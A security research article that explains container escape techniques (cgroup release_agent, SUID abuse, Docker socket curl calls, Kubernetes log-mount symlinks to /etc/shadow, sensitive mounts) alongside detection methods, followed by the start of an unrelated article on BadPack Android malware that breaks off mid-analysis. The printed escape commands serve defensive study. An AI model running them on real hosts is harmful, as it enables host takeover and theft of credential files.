Container Breakouts: Escape Techniques in Cloud Environments

Executive Summary

This article reviews container escape techniques, assesses their possible impact and reveals how to detect these escapes from the perspective of endpoint detection and response (EDR).

As cloud services rise in popularity, so does the use of containers, which have become an integrated part of cloud infrastructure. Although containers provide many advantages, they are also susceptible to attack techniques like container escapes.

Many containers are internet-facing, which poses an even greater security risk. For example, an external attacker who has gained low-privilege access to a container will attempt to escape it through a variety of methods that include exploiting misconfigurations and vulnerabilities.

Container escapes are a notable security risk for organizations, because they can be a critical step of an attack chain that can allow malicious threat actors access. We previously published one such attack chain in an article about a runC vulnerability. In it, we discuss how attackers could exploit CVE-2019-5736 to gain root-level code execution and break out of a Docker container. Since then, organizations have increasingly published similar vulnerabilities that attackers could use to escape containers.

Palo Alto Networks customers are better protected from the container escape techniques we discuss in this article with our Cortex and Prisma Cloud solutions.

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Related Unit 42 Topics Container Escape, Containers, Docker, Kubernetes

What Is a Container?

In its simplest form, a container is basically a group of processes that compose an application, running in an isolated user space but sharing the same kernel space. This is in contrast to virtual machines, where the entire host is virtualized. We explain what an isolated user space means when we review how containers work.

In some cases, containers use actual virtualization instead of isolated user space, but those cases are not applicable to this article.

Why Do We Need Containers?

People use containers for efficient resource utilization because they allow the use of multiple systems on a single server. Containers achieve this by creating an isolated process tree, network stack, file system and various other user-space components using the namespace mechanism provided by the operating system.

The isolation within a container means an application can have its own tailored environment. Applications that could never run together can instead run within their own containers on the same server.

This approach allows a container to interact with its own set of user-space components that are abstracted from the host, thus creating an isolated user-space for every container. Hence, this enables applications within a container to operate as if they were running within a dedicated server. This feature is also the reason containers are ideal for microservices-based applications.

Containers are also highly portable, as they hold all necessary dependencies required for their operation and can seamlessly execute on any system running a supported container runtime.

Nonetheless, the container landscape brings challenges. Sharing the same kernel and often lacking complete isolation from the host's user-mode, containers are susceptible to various techniques employed by attackers seeking to escape the confines of a container environment. These techniques are collectively known as container escapes.

How Do Containers Work?

Before diving into the inner workings of containers, we should understand how the Linux operating system works. In Linux, when a process is spawned, it inherits its attributes from its parent process, including the following:

  • Permissions
  • Environment variables (unless explicitly defined)
  • Capabilities
  • Namespaces.

Containers leverage this mechanism to produce an isolated process tree.

The application responsible for the container orchestration is called the container runtime.

The container runtime is responsible for initiating a process and adjusting its attributes to limit and isolate not only the process itself but also all its child processes. The process is then renamed to init, executing the commands defined in the container configuration file.

Usually, the container runtime isn’t used directly but by using an application such as a container CLI or a container orchestration system that communicates with the container runtime.

An example of a container CLI is Docker Engine, which uses containerd as the container runtime and also Dockerfile as the container configuration file. Another example of a popular container orchestration system is Kubernetes, which can also use containerd as the container runtime.

The attributes subject to modification by the container runtime to perform process isolation include the following:

While not all container engines leverage each of these attributes, many do.

To better understand how containers work, let's examine the example of two attributes particularly relevant to container isolation and privilege restriction: capabilities and namespaces.

Capabilities

According to the Linux manual page on capabilities:

Linux divides the privileges traditionally associated with superuser into distinct units, known as capabilities, which can be independently enabled and disabled.

Essentially, the capabilities attribute is a direct reflection of its name: the range of actions a process is capable of.

Linux implements a capabilities attribute because of the need to limit processes with more means than just users and groups. The capabilities attribute specifically restricts operations that processes with root privileges can perform.

Below, Figure 1 provides a comprehensive list of Linux capabilities.

The image displays a list of Linux capability constants in a terminal-like black background with white monospaced font, showing various system permissions such as 'cap_chown', 'cap_kill', 'cap_setuid', among others to configure system-level security.
Figure 1. List of available Linux capabilities.

As noted in Figure 1, even common operations like chown (cap_chown) or ptrace (cap_sys_ptrace) are part of the array of root operations that can be controlled using the capabilities mechanism. See the Linux manual page on capabilities for more information.

The logic is straightforward: removing a capability removes the inability to perform its corresponding operation, even with root privileges. For example, removing the cap_sys_ptrace capability renders a process incapable of executing the ptrace system call (syscall) on any other process, regardless of the privilege level of the user launching the program.

By strategically removing unnecessary and high-privilege capabilities from the processes involved in container creation, the container engine can execute containers securely, even with root privileges. This security mechanism is made possible through the inheritable capabilities mechanism of Linux.

Regrettably, administrators may not eliminate all high-privileged capabilities when establishing a container using a container engine. In such instances, attackers can leverage these retained capabilities in various methods of container escapes based on the specific capabilities available to the process from within the container.

Namespaces

According to the Linux manual page on namespaces:

A namespace wraps a global system resource in an abstraction that makes it appear to the processes within the namespace that they have their own isolated instance of the global resource. Changes to the global resource are visible to other processes that are members of the namespace, but are invisible to other processes. One use of namespaces is to implement containers.

In process management, if capabilities define what a process can do, then namespaces define where these actions can be performed. Essentially, namespaces provide a layer of abstraction that enables a process and its children to operate as if they possess their own exclusive instance within a global resource.

Various types of namespaces exist, each responsible for a distinct type of global resource within the operating system (OS).

One of the most straightforward namespaces to understand is the process identifier (PID) namespace. When an administrator or software creates a new PID namespace, the OS assigns the process responsible for the namespace creation the PID of 1. The OS then assigns the next PID of 2 to its first child process, 3 to its second child process, 4 to its third child process, and so on.

Consider a scenario where a process runs with root privileges and possesses the cap_kill capability, enabling it to bypass permission checks and terminate almost any process. However, if this process operates within a new PID namespace, its ability to terminate processes is restricted to the processes within the same namespace. Other processes outside of this namespace are essentially non-existent to this original process with the cap_kill capability.

Namespaces essentially serve as a mechanism to enforce isolation, with additional features like capabilities and seccomp to prevent unwanted interference or escape to other namespaces.

Below, Figure 2 shows the available Linux namespaces, as detailed in the Linux man page on namespaces.

A table detailing namespaces in Linux, with columns for Namespace, Flag, Page, and Isolates. Rows include IPC, Network, Mount, PID, Time, User, and UTS, each paired with their corresponding flag, referenced manual page, and functional isolates.
Figure 2. List of available Linux namespaces with a short description.

Container Escapes

People may associate container escapes only with the ability to execute a program within the container on the host system. However, not all container escape techniques follow this paradigm. Container escape scenarios can also involve an attacker leveraging the container to steal data from the host or perform privilege escalation.

Let's review some examples of container escape techniques.

Example 1: User-Mode Helpers

Our first example is a collection of techniques called user-mode helpers. This example takes advantage of the call_usermodehelper kernel function, hence its name.

How the User-Mode Helper Attack Technique Works

Intended for drivers, the call_usermodehelper function prepares and initiates a user-mode application directly from the kernel, enabling the kernel to execute any program in user-mode with elevated privileges.

However, under specific conditions, users can cause a driver or other kernel-mode component to execute a user-mode program with the same escalated privileges. The term user-mode helpers encapsulates instances where the kernel executes a user-mode program defined in a user-mode file under these specific conditions.

Remarkably, an attacker can trick the kernel into running various programs with root privileges by creating and modifying certain files in user-mode. Although this requires root access, if an attacker gains control over a container with elevated privileges or an exploitable vulnerability, the attacker can easily perform the required actions.

User-Mode Helper: Release Agent

This user-mode helper technique leverages cgroup and its release_agent file to achieve a container escape. While we have reported a previous vulnerability affecting cgroup, this container escape method is not based on a vulnerability. Instead, an attacker with root privileges can employ this user-mode helper technique to escape a container. Cgroups are used to regulate the resources allocated to a process, providing the means to restrict resource usage.

In this example, we use a technique originally presented by Brandon Edwards and Nick Freeman at Black Hat USA in 2019 [PDF] for a cgroup release_agent escape. By enabling a particular cgroup release_agent, an attacker can execute a program when the group is emptied. While Linux includes this feature for the proper cleanup of cgroups, the OS has no strict constraints, allowing the execution of any desired executable.

The implementation of this technique involves the following steps:

  1. Create and mount a directory, assigning it a cgroup.
  2. Establish a new group by creating a directory within the cgroup.
  3. Set the contents of the file notify_on_release to 1. This activates the user-mode helper mechanism (present in every new cgroup).
  4. Specify the absolute path of the executable in the release_agent file. This file, located in the root directory of every cgroup type, is shared among all cgroups. The absolute path of the root directory can be obtained by querying the /etc/mtab file from within the container as demonstrated below in Figure 3.
  5. Empty the group by writing 0 to the cgroup.procs file. Even if the group was initially empty, the executable specified in release_agent will still be executed.

Below, Figure 3 shows an implementation of this technique using a concise sequence of shell commands.

Multiple lines of code in white, which includes various Linux terminal commands and a script aimed at modifying system settings and simulating a network attack.
Figure 3. Implementing release_agent escape using shell commands. Source: A compendium of container escapes - Brandon Edwards and Nick Freeman - Black Hat USA 19 [PDF].
This serves as an example of using a legitimate user-mode helper to escape a container with just the execution of a few shell commands.

Other user-mode helper techniques for container escape follow a similar pattern to this example. The key factor is that the ability to modify related files from inside the container provides the ability to execute any program with root privileges on the host system.

Our research indicates that user-mode helper techniques have the most potential impact. This is mainly due to the relative ease of container escape and the repercussions of a successful implementation.

How to Detect User-Mode Helper Attack Techniques

Detecting this array of techniques involves a systematic approach.

  1. Mapping call_usermodehelper calls: Begin by comprehensively cataloging all calls for call_usermodehelper used by the kernel.
  2. Identifying Affected calls: Determine which call_usermodehelper calls are susceptible to manipulation by user-mode programs via files.
  3. Assessing Container Alteration: Investigate whether these files can be modified from within a container to execute a designated program.
  4. Monitoring User-Mode Helpers Files: Once the groundwork is done, the detection strategy entails monitoring modifications to the related files associated with each user-mode helper. The focus is specifically on identifying changes originating from within a container's user-mode program.

This multistep process enhances the ability to proactively detect and mitigate potential security risks associated with user-mode helper exploitation within containers.

Real-World Detection of User-Mode Helper Attack Techniques

Below, Figure 4 shows Cortex XDR identifying an attempt to alter the release_agent file for a container escape using deepce.sh, a penetration testing tool from the DEEPCE repository.

The image is a flowchart illustrating a cybersecurity attack on a container technology system. It starts with a node labeled "yosef/Ubuntu-20/root" and ends with "deepce.sh", denoted by two red icons symbolizing danger or critical points. The process flows through several steps, linked by arrows: starting with 'CMD', moving through 'runC', and finally executing scripts 'bash' and 'deepce.sh'. Each node and transition is clearly labeled to indicate the sequence and nature of the actions within the system. Below the diagram, there is a command line instruction: "bin/sh ./deepce.sh --no-enumeration --exploit PRIVILEGED --username deepce --password deepce".
Figure 4. Cortex XDR alert on an attempted release_agent container escape using DEEPCE.

Figure 4 presents a causality chain image of the alert in a Cortex XDR incident report that provides insight into the event. This alert reveals the process execution hierarchy of the specified tool and shows at which stage it detected the activity and prevented its execution. The Cortex XDR alert in Figure 4 also shows the command line of the tool to provide more context to its execution.

Example 2: Privilege Escalation Using SUID

Because container security is reinforced through mechanisms we previously covered in this article (such as capabilities, namespaces and seccomp) many containers are able to operate with root privileges on their hosts. This technique takes advantage of that.

How the SUID Attack Technique Works

This technique enables a user that already has limited permissions on the host to execute a program on the host with root privileges from within the container. This is not a full container escape, since the attacker must already have initial access to the host. But it allows such an attacker to perform actions on the host with root-level permissions even if the attacker initially has very limited permissions.

Attackers achieve this escalation because a SUID/GUID permissions bit set on a file from within a container retains its permissions outside of the container if that container operates in the same user namespace as the host. This is a common setup for many container environments.

Executing this attack requires the following:

  • A container running as root within the same user namespace as the host
  • An accessible directory from both the host and the container
  • A shell on the host
  • A shell on the container

An attacker using this technique performs the following steps:

  1. Create an executable file in an existing directory shared by the container and the host.
    The attacker can create the file from either the container or the host.
  2. Add the SUID permissions bit from inside the container
  3. Execute the SUID binary from outside the container.

Once these steps are complete, the attacker’s executable file runs on the host with root privileges.

If the prerequisites have been met, this attack is easy for attackers because setting the SUID permissions bit on a file is a simple procedure. Just use the following chmod command:

chmod u+s filename

How to Detect SUID Attack Techniques

Because this is a very specific attack technique, we can use a targeted approach to detection, focusing on key stages of the attack:

  • File creation: Monitor for the creation of a file intended for execution.
  • SUID/GUID bit modification: Detect the chmod operation within a container to add the SUID/GUID bit to a file within a directory shared by the container and its host.
  • File execution outside the container: Detect the instances where the file, now with the SUID/GUID bit set, is executed on the host by a non-root user.

Real-World Detection of SUID Attack Techniques

Figure 5 shows an alert from Cortex XDR detecting and blocking a container escape attempt using the SUID technique.

This image depicts a flowchart of a cybersecurity threat analysis, specifically highlighting a potential malware attack labeled "Container-escaping Protection" with steps involving various system commands like CGO, runc, bash, cp, and chmod, and showing actions to prevent the attack, all accompanied by a severity rating tagged as High. The panel also displays logos of source agents marked with Ubuntu and grouped actions including prevented (blocked).
Figure 5. Cortex XDR alert showing a container escape attempt using the SUID technique.

As shown in Figure 5, Cortex XDR alerted on a chmod command through a bash interface from the container's runtime environment (runc). This chmod command attempted to set the SUID permissions bit on a file in a directory shared by the container and the host.

Example 3: Runtime Sockets

Within the host environment, a container's infrastructure operates using a client/server model. As explained in documentation for container platforms like Docker, on one end, the container CLI serves as the client. On the other end, the container daemon functions as the server. Figure 6 provides a high-level overview of Docker architecture that helps illustrate the client/server nature of a container environment.

Diagram illustrating Docker architecture, including components such as Client, Docker Host, and Registry. The Client side displays command examples like 'docker run', 'docker build', and 'docker pull'. The Docker Host is represented with a Docker daemon, images, and containers showing different configurations. Registry shows NGINX with associated items such as a database symbol and folders marked 'Extensions' and 'Plugins'. Arrows indicate the flow of commands and data between these entities.
Figure 6. Docker infrastructure architecture. Source: Docker Docs.

Runtime libraries implementing this client/server infrastructure are exposing the API server that handles communications between the client and server through Unix sockets, which are called runtime sockets. Attackers can leverage this mechanism by interacting directly with the container's runtime socket from inside the container.

How the Runtime Sockets Attack Technique Works

This technique allows an attacker to create a new privileged container on the same host, then use that new container to escape to the host.

If a runtime socket is mounted inside a container, it grants the ability to control the container runtime by sending commands directly to the API server. Once an attacker uses this runtime socket and establishes control over the container runtime, they can use the Unix socket file to execute API commands. This allows them to easily create a new container to escape from and access the host.

Interacting with the runtime socket using the Unix socket file can be achieved using the following activities:

  • Through the container runtime CLI by specifying the runtime socket as a parameter
  • Through using an executable like curl to communicate through any socket

The former approach allows an attacker to execute regular commands without the need for REST API calls. However, identifying the container runtime and obtaining its CLI inside the container could pose challenges.

Conversely, using common executables like curl presents an advantage, because these files already exist in most container environments. This eliminates the need to install an additional program to communicate to the API server, although this method requires more complex REST API commands.

Below are examples of curl commands using the Docker REST API to interact with the container runtime. In these examples, an attacker creates and starts a new container.

  • curl --unix-socket /var/run/docker.sock http://localhost/containers/json
    • Retrieves information on all created containers
  • curl -H "Content-Type: application/json" --unix-socket /var/run/docker.sock -d {json_containing_container_configuration} http://localhost/containers/create
    • Creates a container based on the specified JSON configuration
  • curl --unix-socket /var/run/docker.sock http://localhost/containers/{container_id}/start
    • Starts the container specified by the {container_id}

Using this runtime socket technique, attackers can create a privileged container with a mount point to the host's root directory. Attackers can then escape from the newly created container through privileged access to the host's file system.

How to Detect Runtime Sockets Attack Techniques

You can detect this form of attack in multiple ways:

  • Monitoring runtime Unix sockets: The most direct approach is to monitor requests made to the container runtime Unix sockets and verify they originate within the container. You can reduce false positives by filtering only impactful requests such as container creation and manipulation.
  • Unix socket file access detection: Another method entails detecting any access to the Unix socket file. However, this approach is susceptible to false positives, given the challenge of filtering out irrelevant instances without full request visibility.
  • CLI or curl command execution: Detection can also focus on identifying the execution of the container runtime CLI or a curl command using the container runtime socket from within the container. While effective, this method might not capture every instance of use.
  • Search attempt detection: An additional approach involves detecting attempts to search for the container runtime socket from within the container. Yet, like other methods, it may not provide thorough coverage.

To improve detection capabilities, you can employ a combination of these methods, thus offering a layered defense strategy for optimal coverage.

Real-World Detection of Runtime Sockets Attack Techniques

Below, Figure 7 shows an alert from Cortex XDR detecting and preventing an attack using the penetration testing tool DEEPCE to escape a container through a mounted container socket using curl.

This image depicts a cybersecurity network flow diagram illustrating an attempted security breach. The diagram shows various components like a CGO box, an runc circle, an XORN Agent, and a bash shell all connected through directional arrows indicating the flow of the breach attempt towards a script named "deepce.sh." There's an alert icon with a high severity level and additional details such as "Prevented (blocked)" indicating the breach was stopped. The console at the bottom details the observed behaviors, showing categories like "Anomaly Detection" and "Container escaping Protection." Specific technical data, paths, and identifiers are laid out in a structured table format. The background shows a computer interface with a directory path "/yosef/Ubuntu-20/root." Essential details like timestamps, source tags, alongside a concise description of each module's activity, help give context to the security event depicted.
Figure 7. Cortex XDR alert showing a container escape attempt using the runtime socket technique.

Example 4: Log Mounts

This is a Kubernetes-specific attack, and it can more accurately be called a pod escape, since the Kubernetes platform calls its containers pods and the attack uses a Kubernetes-specific feature to escape the container. Aqua Security published an insightful article on this technique in 2019.

How the Log Mount Attack Technique Works

This attack can grant an attacker within a pod read access to any directory or file on the host with root privileges. The requirements for this technique are as follows:

  1. Have access to a pod with a mount to the host's /var/log directory
  2. Have the capability to read logs using the Kubernetes interface
    1. This can be achieved as a regular Kubernetes user with log access
    2. Alternatively, you can employ a pod service account with log access

In the most favorable scenario, the logs will be accessible from inside the pod with the /var/log host mount.

The vulnerability lies in the way Kubernetes accesses pod logs. Each pod has a corresponding log file within /var/log, symbolically linked (symlink) to a log file located inside the container directory at /var/lib/docker/containers.

The flaw arises from how kubelet reads the symlink's contents without validating its destination. By manipulating the symlink destination from the log file to /etc/shadow, for example, an attacker can access the /etc/shadow file of the host.

The attack does not end there. When generating an HTTP POST request through the Kubernetes kubectl command line tool, behind the scenes, the tool accesses the logs by specifying the relative path of a targeted log file from the /var/log directory. This means that if an attacker creates a symlink to the root directory from inside /var/log, the attacker gains access to the entire file system with root permissions.

For instance, a symlink to the host’s root directory named root_host inside /var/log, coupled with an HTTP POST request specifying the log file root_host/etc/passwd, enables an attacker to retrieve the /etc/passwd file of the host.

While the requirement of obtaining access to both a pod with /var/log mounted and a Kubernetes account with log reading capabilities for this technique is not an easy task, it remains a possibility.

How to Detect Log Mount Attack Techniques

We can detect this form of attack in two ways:

  • HTTP request monitoring: Monitor all HTTP requests intended for reading logs and filter them for improper paths. However, this approach might not identify attacks that alter a legitimate log symlink.
  • Symlink creation/modification detection: Detect any symlink created or changed within the host's /var/log directory that originates from inside a pod. To implement this, we must ensure we detect write operations occurring in the /var/log directory of the host instead of the container.

To improve detection of these log mounts, we can combine these two detection methods.

Real-World Detection of Log Mount Attack Techniques

Figure 8 shows an alert from Cortex XDR for detecting and preventing a container escape attempt from a Kubernetes pod using this technique. The alert shows an attempt to create a symlink in /var/log to access the host file system. This attempt uses a bash shell running the ln command in an attempt to create the symlink.

A diagram of a cybersecurity process flow with four steps depicted as numbered circular icons connected by arrows. Each step is labeled with technological terms: "CGO," "runc," "bash," and "ln," representing different stages in a software security check. The diagram is displayed on a graphical user interface titled "yosef-Ubuntu-root" and features additional details such as timestamps, user paths, and security signatures. There's also a notification of a blocked action at the last step in a green box.
Figure 8. Cortex XDR alert data on a log mount escape attempt using /var/log.

Example 5: Sensitive Mounts

This technique focuses on mounted directories within a container that point to sensitive destinations like the host's /etc directory. These destinations are attractive to attackers because they can provide access to files with private information like the host's /etc/passwd file. These types of mounts are a misconfiguration, and we refer to these mount points as sensitive mounts.

Although this is merely taking advantage of a misconfiguration, this technique falls under the umbrella of container escape methods.

How the Sensitive Mount Attack Technique Works

The required action for this technique is merely to discover and access these sensitive mounts within misconfigured containers. For instance, an attacker might gain access to a container with a mount named /host_etc that accesses the host's /etc directory. By accessing /host_etc/password from the misconfigured container, the attacker has effectively accessed the host's /etc/passwd file.

This technique is the simplest way to escape a container, but it poses challenges for detection.

How to Detect Sensitive Mount Attack Techniques

We can monitor and alert on containers that mount directories with sensitive information, but this is not an active protection.

For effective protection against this technique, we must detect every access (read, write, create or remove) to predetermined sensitive files and locations. However, this strategy risks an influx of false positives, and it illustrates a crucial concern. We must ensure the detected file access corresponds to the correct file on the host.

For example, /etc/shadow is an example of a sensitive file that we should protect from unauthorized access. The container runtime usually establishes a new container's root directory at a designated location in the hosts file system using chroot or pivot_root to establish proper levels of access from the container. So the container’s /etc/shadow file is not the same file as the host’s /etc/shadow file, and direct monitoring of the container’s /etc/shadow will not provide us with any value in detecting the attack.

Detecting access to any file named shadow raises another challenge. Mounts may not retain their original path and have no indication of the full path information.

The solution involves converting the path of each detected file access from its container path to its corresponding host path. This allows for monitoring based on the host path, ensuring accurate detection of attacks on sensitive files or directories that may not be directly shared between the container and the host. While the solution is straightforward in concept, its implementation could pose challenges.

How can we defend against this type of container escape method? The challenge is to know which mounted files from inside the container correspond to a sensitive file on the host. Cortex XDR addresses this challenge by converting the path of relevant events and detecting file access from these sensitive mounts in real-time.

Real-World Detection of Sensitive Mount Attack Techniques

Figure 9 shows an alert for Cortex XDR blocking a container escape attempt through a sensitive mount. Cortex XDR caught an attempt to access a sensitive file on the host through a sensitive mount on a misconfigured container using the bash interface.

Image displays a cybersecurity alert diagram on a yosef-Ubuntu-20 system. The alert concerns malware named "Container-escape-Protection-Ubuntu". It highlights three stages: CGO with score 4, runc with score 1, and bash with score 4. Symbols and connecting lines between stages indicate process flow, and actions to address the alert include prevention measures, shown as blocked.
Figure 9. Cortex XDR alert data on a sensitive mount escape attempt.

Testing Environment

In our testing environment, we opted for a Kubernetes cluster using the containerd container runtime. Notably, containerd is the same container runtime employed by the Docker Engine at present.

The techniques we examined and the coverage we have incorporated in Cortex XDR are not reliant on any particular container runtime. Our approach ensures that the detections and protections are applicable across diverse container runtimes, maintaining flexibility and effectiveness in varied runtime environments.

Conclusion

In this article, we examined different container escape methods. The results highlight the growing risk of attack amid the increasing popularity of container technology. While some methods could grant an attacker partial access to the host of a container, other techniques can grant attackers full access to the host. As more organizations use containers, the risk from these escape techniques will likely remain a notable feature of our threat landscape.

To mitigate potential attacks, anyone who uses containers must be aware of the risk of these techniques and adhere to recommended security and detection guidelines.

We have incorporated robust detection logic in Cortex XDR based on the detection principles discussed in this article.

Palo Alto Networks customers receive better protection from these container escape techniques through Cortex XDR, XSIAM Linux Agent, Cortex XDR agent for Cloud and the Prisma Cloud Defender Agent for customers using the “Container Escaping” module.

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Additional Resources

Updated August 6, 2024, at 9:40 a.m. PT to fix a broken link.

Beware of BadPack: One Weird Trick Being Used Against Android Devices

Executive Summary

This article discusses recent samples of BadPack Android malware and examines how this threat’s tampered headers can obstruct malware analysis. We also review the effectiveness of various freely available tools for analyzing BadPack Android Package Kit (APK) files.

The cybersecurity landscape has seen a dramatic increase in malicious Android applications in recent years. One major contributor to this trend is APK samples bundled as BadPack files.

BadPack is an APK file intentionally packaged in a malicious way. In most cases, this means an attacker has maliciously altered header information used in the compressed file format for APK files.

These tampered headers are a key feature of BadPack, and such samples typically pose a challenge for Android reverse engineering tools. Many Android-based banking Trojans like BianLian, Cerberus and TeaBot use BadPack.

Palo Alto Networks customers receive better protection from these BadPack APK samples through our Next-Generation Firewall with Cloud-Delivered Security Services, including Advanced WildFire, Advanced DNS Security and Advanced URL Filtering.

Palo Alto Networks reported these findings to Google. Based on Google’s current detection, no apps containing this malware are found on Google Play. Android users are automatically protected against known versions of this malware by Google Play Protect, which is on by default on Android devices with Google Play Services. Google Play Protect can warn users or block apps known to exhibit malicious behavior, even when those apps come from sources outside of Play.

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Related Unit 42 Topics Android APK

Background

APK files are applications used by the Android operating system (OS). APK applications are packages that use the ZIP archive format. These packages contain a file named AndroidManifest.xml. This is the Android Manifest that stores data and instructions for the archive's content.

AndroidManifest.xml contains valuable information about an APK-based application, especially for APK malware samples. In a BadPack APK file, attackers have tampered with its ZIP header data, attempting to prevent analysis of its content.

Analysis tools like Apktool and Jadx often struggle with extracting content from BadPack APK files. For example, we found Apktool failed to extract AndroidManifest.xml from one of the BadPack APK samples we review later in this article.

We reviewed our Advanced WildFire detection telemetry from June 2023 through June 2024 for BadPack APK files, and we discovered almost 9,200 matching samples. The graph in Figure 1 lists detections by month, illustrating BadPack trends during this time frame.

Image 1 is a column graph of the count of BadPack observed in Advanced WildFire from June 2023 to June 2024. There was a leap in May 2024.
Figure 1. BadPack observations in Advanced WildFire, June 2023 through June 2024.

The number of samples we found through Advanced WildFire indicates that BadPack APK malware is a notable threat. To combat this threat, we must better understand BadPack.

BadPack prevents normal extraction techniques, and since the most critical component of an APK archive is its Android Manifest, we should first understand the role AndroidManifest.xml in an APK archive.

Android Manifest

The Android Manifest file AndroidManifest.xml is a crucial configuration file embedded within the APK sample. This manifest provides essential information about the mobile application to the Android device operating system.

This information includes package components to handle activities initiated by the user and services run by the application. The manifest also includes the permissions the user must grant the application for it to run correctly and the versions of Android the application runs on.

Extracting, reading and processing the Android Manifest is the first step in static analysis of an APK sample. As such, malware authors make it their goal to prevent security analysts from performing these activities. Malware authors achieve this by tampering with headers used in the ZIP archive format of the APK file.

ZIP File Structure

The ZIP format allows users to compress and archive content into a single file. The layout of a ZIP file contains two main types of headers that specify the archive's structure and content:

  • Local file headers
  • Central directory file headers

Malware authors can alter fields within these headers to prevent analysts from extracting an APK file's content, and the results can also allow the APK file to run on an Android device.

Local File Headers

Local file headers represent the individual files contained in a ZIP archive. A ZIP archive contains at least one file, and the first bytes of a ZIP archive always start with a local file header.

If the ZIP archive contains another file, this local file header structure is repeated later in the ZIP archive. These local file headers always start with a 4-byte signature, with the first 2 bytes as the ASCII characters PK, which represent the initials of ZIP archive format creator Phillip Katz. Figure 2 shows the layout of a local file header.

Image 2 is a chart of the local header file layout.
Figure 2. Layout of the local file header structure. Source: Florian Buchholz, The structure of a PKZip file.

Figure 3 shows an example of the first bytes from a ZIP archive.

Image 3 is the hexadecimal dump of the ZIP archive.
Figure 3. Hexadecimal dump of a ZIP archive. Source: Florian Buchholz, The structure of a PKZip file.

We can map these byte values to the corresponding fields of a local file header as shown below in Figure 4.

Image 4 is an example of a local file header structure with field values aded. These include the signature, version, version needed, flags, compression, mod time and more.
Figure 4. Field values populated into the local file header structure. Source: adapted from Florian Buchholz, The structure of a PKZip file.

The compression field of a local file header is located at byte offset 0x08 and 0x09. This field can contain different values starting from 0x0000, which means the file was not compressed. In Figure 4 above, the example shows a value of 0x0800. This value represents the DEFLATE compression algorithm, the most common value used for ZIP archives.

Figure 4 above shows the compressed size at byte offset 0x12 through 0x15 is 0x45, which translates to 69 bytes. The uncompressed size at byte offset 0x16 through 0x19 is 0x4a, which is 74 bytes. The compressed item's filename is 0x66696c6531, which translates to file1 in ASCII text.

In Figure 4, the file header for this ZIP archive ends at 0x37, and the content of the compressed file would begin at 0x38.

Central Directory File Headers

The central directory file header is used for ZIP archives that contain directories. This header appears after the end of the last local file header in a particular directory within a ZIP archive.

In APK files, we sometimes find an optional APK Signing Block between the last local file header and the central directory header. Figure 5 shows the layout of a central directory file header.

Image 5 is an example of the layout of the central directory file header. The information includes the signature, version, flags, compression, external attributers, file name, extra field and more.
Figure 5. Layout of the central directory file header. Source: Florian Buchholz, The structure of a PKZip file.

Using the same file from Figure 3, we must scroll down to the bytes beginning at 0x09a2 to find the first central directory file header. Figure 6 below shows the content of this header.

Image 6 is an example of the central directory file header structure values in hexadecimal, displayed in columns and rows.
Figure 6. Hexadecimal dump showing a central directory file header structure values. Source: Florian Buchholz, The structure of a PKZip file.

In the example of the central directory header mapped in Figure 7, we find the same compression-related values as the local file header shown earlier in Figure 4. However, the byte offsets for these fields are different from those shown in Figure 4.

Image 7 is an example of the central directory file header structure with field values aded. These include the signature, version, version needed, flags, compression, mod time and more.
Figure 7. Field values populated into the central directory file header structure. Source: adapted from Florian Buchholz, The structure of a PKZip file.

For the central directory header in Figure 7, the byte offset for the compression value is at 0x0a to 0x0b, and the value is 0x0800, representing the same DEFLATE compression algorithm we discussed immediately after Figure 4.

Figure 7 also shows the compressed size at byte offset 0x14 through 0x17 is 0x45, which translates to 69 bytes. The uncompressed size at byte offset 0x18 through 0x1b is 0x4a, which is 74 bytes. These are the same values as the local file header in Figure 4, but at different byte offsets.

The compressed item's filename is 0x66696c6531, which translates to file1 in ASCII text.

In Figure 7, the central directory header ends at 0x5b, and the content of the compressed file would begin at 0x5c.

In the ZIP archive format used by an APK file, values in the local file header and central directory file header should be consistent with each other. This means that information for a specific item within an APK file like compression method, compressed size and uncompressed size are the same in each header. We saw this when comparing the values for a compressed item named file1 in the example from Figure 4 and Figure 7.

The BadPack technique alters these values for malicious APK files, making a mismatch between the local file header and the central directory file header.

Analyzing the BadPack Technique

In a malicious BadPack sample, the authors have tampered with the ZIP structure headers, making the APK fail to extract and decode AndroidManifest.xml. This causes a chain reaction of errors downstream in the static analysis pipeline. As a result, the file cannot be read and fully processed.

Malware authors can manipulate these values in any of the following ways:

  1. Specifying the correct compression method STORE, but accompanied by an invalid compressed size.
  2. Specifying any compression method value that is not DEFLATE, when the actual compression method of the payload is STORE.
  3. Specifying any compression method value in the local file header only, when the actual compression method of the payload is DEFLATE.

Android malware static analysis tools like Apktool or Jadx are generally stricter than the Android system runtime on Android devices. For these analysis tools, an APK sample must adhere to ZIP file format specifications. Therefore, Apktool and Jadx parse both the local file header and central directory file header of the ZIP structure headers in an APK file.

However, Android devices are not as strict about the official file format as these analysis tools. An APK file may contain invalid values that do not fully adhere to the official file format specification, and it may still run. This is because the Android system runtime only inspects the central directory file header. If a value from the local file header does not match, the Android runtime assumes what a correct value should actually be.

It is precisely this difference in behavior that causes analysis tools like Apktool and Jadx to fail to analyze a BadPack APK sample that installs and runs properly without issue on an Android device.

We can successfully analyze BadPack APK samples by reversing these changes to restore the original ZIP structure header values before using APK analysis tools.

Tracing the Android Codebase Implementation

We can trace back the essential implementation responsible for the difference in behavior between malware analysis tools and the Android system runtime to a section of code in the Android framework dealing with extracting content from an APK file.

In code, a method accepts input parameters. A method has a body of instructions to transform these input parameters into some output result returned as value(s).

A method body is much like a recipe in cooking. When the program is executed, a function is an instance of the invocation of a method, which receives input arguments, according to the input parameters defined in the method.

At runtime, invocation of this function with the string "AndroidManifest.xml" as the path argument triggers this code execution path. Figure 8 below outlines key steps of the routine (e.g., omitting error handling), simplified for readability.

Image 8 is a screenshot of the main routine for APK extraction in Android runtime. It includes three steps in total (labeled as comments).
Figure 8. Main routine in Android runtime for APK extraction. Source: The Android Open Source Project.

The logic of the code in Figure 8 consists of the following steps, with the main if-condition line highlighted:

Step 1: The central directory file header of the AndroidManifest.xml entry is retrieved. This succeeds because the header structure is still intact, although certain values have been manipulated.

